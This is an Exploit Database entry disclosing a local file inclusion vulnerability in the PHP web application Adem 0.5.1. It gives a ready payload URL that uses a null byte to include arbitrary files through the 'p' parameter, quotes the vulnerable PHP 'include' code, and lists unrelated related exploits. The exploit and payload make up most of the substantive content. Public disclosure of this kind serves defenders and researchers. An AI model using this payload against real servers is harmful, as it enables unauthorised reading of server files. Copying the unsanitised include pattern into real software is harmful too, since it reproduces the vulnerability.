Exploit Database - Logo

Adem 0.5.1 - Local File Inclusion

EDB-ID: 33072 Author: JIKO Published: 2014-04-28
CVE: N/A Type: Webapps Platform: PHP
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]
 
Author        : JIKO
 
----------[Script Info]
 
Site        : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version     : 0.5.1
Download    : https://codeload.github.com/4FSB/Adem/zip/master
 
----------[exploit Info]
 
Exploit :
http://Path/index.php?p=File%00

Line : 8-10
Page : index.php
Code :
     if(is_file($file) && file_exists($file)){
            include $file;
       

 }
----------[exploit Fin]
« Previous Exploit Next Exploit »

Related Exploits

Trying to match OSVDBs (1): 106353
Trying to match setup file: a0c4f0d176f87ceda9b9890af09ed644
Other Possible E-DB Search Terms: Adem 0.5.1,  Adem
Date D V Title Author
2007-05-26 Verified Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflowrgod
2007-08-24 Verified Arcadem 2.01 - 'index.php' Remote File Inclusionsm0k3
2007-12-21 Verified Arcadem LE 2.04 - 'loadadminpage' Remote File InclusionKnocKout
2008-09-29 Verified Arcadem Pro - 'articlecat' SQL InjectionHussin X
2009-08-18 Verified Arcadem Pro 2.8 - 'article' Blind SQL InjectionMr.SQL
2005-12-12 Verified BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loadingdr_insane
2008-03-26 Verified BlackBoard Academic Suite 6/7 - '/bin/common/announcement.pl?data__announcements___pk1_pk2__subject' Cross-...Knight4vn
2008-03-26 Verified BlackBoard Academic Suite 6/7 - '/webapps/BlackBoard/execute/viewCatalog?searchText' Cross-Site ScriptingKnight4vn
2003-03-17 Verified Kebi Academy 2001 - Input Validationdong-h0un U
2005-04-02 Verified Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow (PoC)Luigi Auriemma
2012-05-16 Verified Unijimpe Captcha - 'captchademo.php' Cross-Site ScriptingDaniel Godoy
2008-06-19 Verified Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple VulnerabilitiesBugReport.IR
2007-08-27 Verified Arcadem 2.01 - SQL Injection / Remote File InclusionSmOk3
2010-06-29 Verified ArcademSX 2.904 - 'cat' Cross-Site ScriptingTh3 RDX
2017-10-24 Waiting verification FS Trademe Clone - 'id' SQL Injection8bitsec
2017-12-09 Verified FS Trademe Clone 1.0 - 'search' / 'id' SQL InjectionIhsan Sencan
2017-03-09 Waiting verification TradeMart 1.1 - SQL InjectionIhsan Sencan
2010-10-02 Verified TradeMC E-Ticaret - SQL Injection / Cross-Site ScriptingKnocKout
2009-03-02 Verified Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting VulnerabilitiesIsfahan
Menu